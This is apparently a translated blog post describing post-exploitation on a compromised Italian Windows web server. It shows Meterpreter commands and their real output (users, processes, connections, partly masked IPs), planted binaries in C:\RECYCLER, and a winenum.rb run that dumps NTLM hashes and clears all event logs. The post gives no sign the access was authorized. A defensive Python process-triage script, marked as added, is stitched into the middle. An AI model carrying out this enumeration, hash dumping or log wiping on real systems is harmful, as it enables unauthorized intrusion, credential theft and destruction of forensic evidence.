Date/time: 2017. While on an Italian Windows server, I found that after uploading cmd.exe I could only run the set command; none of the commands below would run, so I guessed these system programs had been deleted or had their privileges restricted by the administrator. After getting in I found they had indeed been restricted, but they could still be executed under Administrators and SYSTEM.

  whoami, net, netstat, tasklist, taskkill, systeminfo, ipconfig, arp, cscript ... and so on


The usual approach is to upload these system programs yourself to a readable/writable directory and then run the commands from there. But I often use Metasploit during penetration tests, so this post covers the Meterpreter network commands instead; another reason is that after running an EXP, Lcx.exe and similar programs, the processes could not be killed or the files deleted directly from China Chopper (中国菜刀) for the time being.

Note: with Meterpreter you can run some of these cmd commands without uploading the corresponding system programs (from C:\Windows\system32\) to a readable/writable directory; the privilege level is SERVIZIO DI RETE (the Italian name of NETWORK SERVICE). The corresponding Meterpreter commands are listed below.

0x01 Practical use of stdapi

About stdapi:
stdapi is one of Meterpreter's extensions. It is loaded by default as soon as a Meterpreter session is obtained, so there is no need to load it manually; all extensions can be listed with load/use -l. stdapi's commands cover file read/write, upload/download, directory changes, screenshots, webcam, keylogging, system-related commands and so on.

  1. winenum.rb:/usr/share/metasploit-framework/scripts/meterpreter/winenum.rb
  2. Stdapi:/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/
  3. https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi


(1) getuid = whoami

  meterpreter > getuid
  Server username: NT AUTHORITY\SERVIZIO DI RETE

(2) kill = taskkill

  meterpreter > kill 3268
  Killing: 3268

(3) sysinfo = systeminfo

  meterpreter > sysinfo
  Computer : WEBBY01
  OS : Windows .NET Server (Build 3790, Service Pack 2).
  Architecture : x86
  System Language : it_IT
  Meterpreter : x86/win32

(4) arp = arp

  meterpreter > arp
  ARP cache
  =========
  IP address MAC address Interface
  ---------- ----------- ---------
  10.10.10.190 00:0x:5a:11:21:69 65540
  10.10.10.207 00:0x:29:ab:af:e6 65540
  93.6*.1*8.1 00:2x:97:fe:71:e1 65539
  93.*3.1*8.17 00:0x:29:b6:62:ff 65539

(5) ipconfig = ipconfig/ifconfig

  meterpreter > ifconfig
  Interface 1
  ============
  Name : MS TCP Loopback
  Hardware MAC : 00:00:00:00:00:00
  MTU : 1520
  IPv4 Address : 127.0.0.1
  Interface 65539
  ============
  Name : VMware Accelerated AMD PCNet Adapter #
  Hardware MAC : 00:0c:29:70:34:2b
  MTU : 1500
  IPv4 Address : 93.**.***.12
  IPv4 Netmask : 255.255.255.0
  IPv4 Address : 93.**.***.12
  IPv4 Netmask : 255.255.255.0
  Interface 65540
  ============
  Name : VMware Accelerated AMD PCNet Adapter
  Hardware MAC : 00:0c:29:70:34:21
  MTU : 1500
  IPv4 Address : 10.10.10.26
  IPv4 Netmask : 255.255.255.0

(6) netstat = netstat

  meterpreter > netstat -an
  Connection list
  ===============
  Proto Local address Remote address State User Inode PID/Program name
  ----- ------------- -------------- ----- ---- ----- ----------------
  tcp 0.0.0.0:21 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  tcp 0.0.0.0:23 0.0.0.0:* LISTEN 0 0 1716/tlntsvr.exe
  tcp 0.0.0.0:25 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System
  tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 700/svchost.exe
  tcp 0.0.0.0:443 0.0.0.0:* LISTEN 0 0 4/System
  tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
  tcp 0.0.0.0:1025 0.0.0.0:* LISTEN 0 0 464/lsass.exe
  tcp 0.0.0.0:1026 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  tcp 0.0.0.0:1027 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  tcp 0.0.0.0:1028 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  tcp 0.0.0.0:1113 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
  tcp 0.0.0.0:1433 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
  tcp 0.0.0.0:3306 0.0.0.0:* LISTEN 0 0 1504/mysqld-nt.exe
  tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 2280/svchost.exe
  tcp 10.10.10.26:139 0.0.0.0:* LISTEN 0 0 4/System
  tcp 93.**.***.12:139 0.0.0.0:* LISTEN 0 0 4/System
  tcp 127.0.0.1:1031 0.0.0.0:* LISTEN 0 0 2380/alg.exe
  tcp 10.10.10.26:1433 10.10.10.26:2767 ESTABLISHED 0 0 1316/sqlservr.exe
  tcp 10.10.10.26:2773 10.10.10.26:1433 ESTABLISHED 0 0 2768/w3wp.exe
  ...SNIP...
  udp 0.0.0.0:4500 0.0.0.0:* 0 0 464/lsass.exe
  udp 0.0.0.0:500 0.0.0.0:* 0 0 464/lsass.exe
  udp 0.0.0.0:445 0.0.0.0:* 0 0 4/System
  udp 0.0.0.0:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
  udp 10.10.10.26:138 0.0.0.0:* 0 0 4/System
  udp 10.10.10.26:137 0.0.0.0:* 0 0 4/System
  udp 10.10.10.26:123 0.0.0.0:* 0 0 792/svchost.exe
  udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
  udp 93.**.***.12:138 0.0.0.0:* 0 0 4/System
  udp 93.**.***.12:137 0.0.0.0:* 0 0 4/System
  udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
  udp 127.0.0.1:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
  udp 127.0.0.1:123 0.0.0.0:* 0 0 792/svchost.exe
  udp 127.0.0.1:3626 0.0.0.0:* 0 0 4028/w3wp.exe
  ...SNIP...

(7) ps = tasklist

  meterpreter > ps
  Process List
  ============
  PID PPID Name Arch Session User Path
  --- ---- ---- ---- ------- ---- ----
  0 0 [System Process] 4294967295
  4 0 System 4294967295
  332 4 smss.exe 4294967295
  380 332 csrss.exe 4294967295
  404 332 winlogon.exe 4294967295
  452 404 services.exe 4294967295
  464 404 lsass.exe 4294967295
  620 452 svchost.exe 4294967295
  956 452 spoolsv.exe 4294967295
  996 452 msdtc.exe 4294967295
  1152 452 cisvc.exe 4294967295
  1184 3268 443.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\RECYCLER\443.exe
  1212 452 svchost.exe 4294967295
  1284 452 inetinfo.exe 4294967295
  1316 452 sqlservr.exe 4294967295
  1456 2652 TreeSize.exe 4294967295
  1504 452 mysqld-nt.exe 4294967295
  1548 452 svchost.exe 4294967295
  1588 452 sqlwriter.exe 4294967295
  1716 452 tlntsvr.exe 4294967295
  1756 452 vmtoolsd.exe 4294967295
  1796 3340 explorer.exe 4294967295
  1892 452 svchost.exe 4294967295
  1912 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  1960 452 svchost.exe 4294967295
  2280 452 svchost.exe 4294967295
  2380 452 alg.exe 4294967295
  2596 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  2652 1796 TreeSize.exe 4294967295
  2760 452 svchost.exe 4294967295
  2768 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  3084 1152 cidaemon.exe 4294967295
  3216 3152 vmtoolsd.exe 4294967295
  3228 3152 ctfmon.exe 4294967295
  3236 3152 DesktopInfo.exe 4294967295
  3260 1152 cidaemon.exe 4294967295
  3268 4028 cmd.scr x86 0 C:\RECYCLER\cmd.scr
  3340 3152 taskmgr.exe 4294967295
  4028 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
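As an added example from the defender's side (not code from the original post or from Metasploit), the script below rebuilds the parent/child tree from a pasted Meterpreter ps listing and flags the chain visible in the output above: an IIS worker (w3wp.exe) spawning cmd.scr and 443.exe out of C:\RECYCLER. The sample rows are constructed from that listing; the suspicious-directory list and the allowed-children set are assumptions to tune per environment.

```python
import re
# Constructed sample: rows taken from the post's "ps" listing (PID, PPID, name,
# then arch/session/user/path when Meterpreter could read them).
SAMPLE_PS = r"""
4 0 System 4294967295
1184 3268 443.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\RECYCLER\443.exe
1892 452 svchost.exe 4294967295
3268 4028 cmd.scr x86 0 C:\RECYCLER\cmd.scr
4028 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
"""
# Assumptions to tune per environment: directories no service binary should run
# from, and the only children an IIS worker process is expected to have.
SUSPICIOUS_DIRS = (r"c:\recycler", r"\windows\temp", r"\appdata\local\temp")
ALLOWED_W3WP_CHILDREN = {"w3wp.exe"}
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)(.*)$")   # header/blank rows do not match
PATH = re.compile(r"[A-Za-z]:\\.*$")                    # first drive-letter path in the row

def parse_ps(text):
    """Return {pid: (ppid, name, path)}; path is '' when ps could not read it."""
    procs = {}
    for m in filter(None, map(ROW.match, text.splitlines())):
        pid, ppid, name, rest = m.groups()
        pm = PATH.search(rest)
        procs[int(pid)] = (int(ppid), name.lower(), pm.group(0).strip().lower() if pm else "")
    return procs

def lineage(procs, pid):
    """Process names from pid up to the root; stops at unknown parents or cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid][1])
        pid = procs[pid][0]
    return chain

def triage(text):
    """Map each suspicious PID to the reasons it was flagged."""
    procs = parse_ps(text)
    findings = {}
    for pid, (_, name, path) in procs.items():
        reasons = []
        if any(d in path for d in SUSPICIOUS_DIRS):
            reasons.append("runs from suspicious directory")
        # lineage()[1:] skips the process itself, so w3wp.exe is not its own ancestor
        if name not in ALLOWED_W3WP_CHILDREN and "w3wp.exe" in lineage(procs, pid)[1:]:
            reasons.append("descendant of IIS worker w3wp.exe")
        if reasons:
            findings[pid] = reasons
    return findings
```

The same parser accepts the full listing as pasted, since the header and separator rows simply do not match ROW.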

(8) run winenum.rb
https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/winenum.rb

  meterpreter > run winenum.rb
  [*] Running Windows Local Enumeration Meterpreter Script
  [*] New session on 93.**.***.12:1998...
  [*] Saving general report to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233/WEBBY01_20150207.0233.txt
  [*] Output of each individual command is saved to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233
  [*] Checking if WEBBY01 is a Virtual Machine ........
  [*] This is a VMware Workstation/Fusion Virtual Machine
  [*] UAC is Disabled
  [*] Running Command List ...
  [*] running command ipconfig /all
  [*] running command ipconfig /displaydns
  [*] running command arp -a
  [*] running command net view
  [*] running command netstat -nao
  [*] running command netstat -vb
  [*] running command netstat -ns
  [*] running command cmd.exe /c set
  [*] running command route print
  [*] running command net accounts
  [*] running command net session
  [*] running command net user
  [*] running command net localgroup
  [*] running command net localgroup administrators
  [*] running command net group administrators
  [*] running command net share
  [*] running command net group
  [*] running command net view /domain
  [*] running command tasklist /svc
  [*] running command netsh firewall show config
  [*] running command gpresult /SCOPE COMPUTER /Z
  [*] running command gpresult /SCOPE USER /Z
  [*] Running WMIC Commands ....
  [*] running command wmic useraccount list
  [*] running command wmic group list
  [*] running command wmic netlogin get name,lastlogon,badpasswordcount
  [*] running command wmic service list brief
  [*] running command wmic logicaldisk get description,filesystem,name,size
  [*] running command wmic volume list brief
  [*] running command wmic netclient list brief
  [*] running command wmic netuse get name,username,connectiontype,localname
  [*] running command wmic share get name,path
  [*] running command wmic nteventlog get path,filename,writeable
  [*] running command wmic startup list full
  [*] running command wmic product get name,version
  [*] running command wmic rdtoggle list
  [*] running command wmic qfe
  [*] Extracting software list from registry
  ...SNIP...


What the winenum.rb script does (if you are interested, read the code and make your own small modifications):

  1. Checks whether the target machine is a VMware virtual machine and whether UAC (User Account Control) is Disabled or Enabled.
  2. Process migration (migrate) by PID; runs the DOS, WMIC and Netsh commands in its command list and returns their output as strings.
  3. Lists the available tokens with incognito, dumps the system's NTLM hashes, exports the target machine's registry, and extracts the installed software list from the registry.
  4. Clears all event logs (security, system, application, directory service, dns server, file replication service).
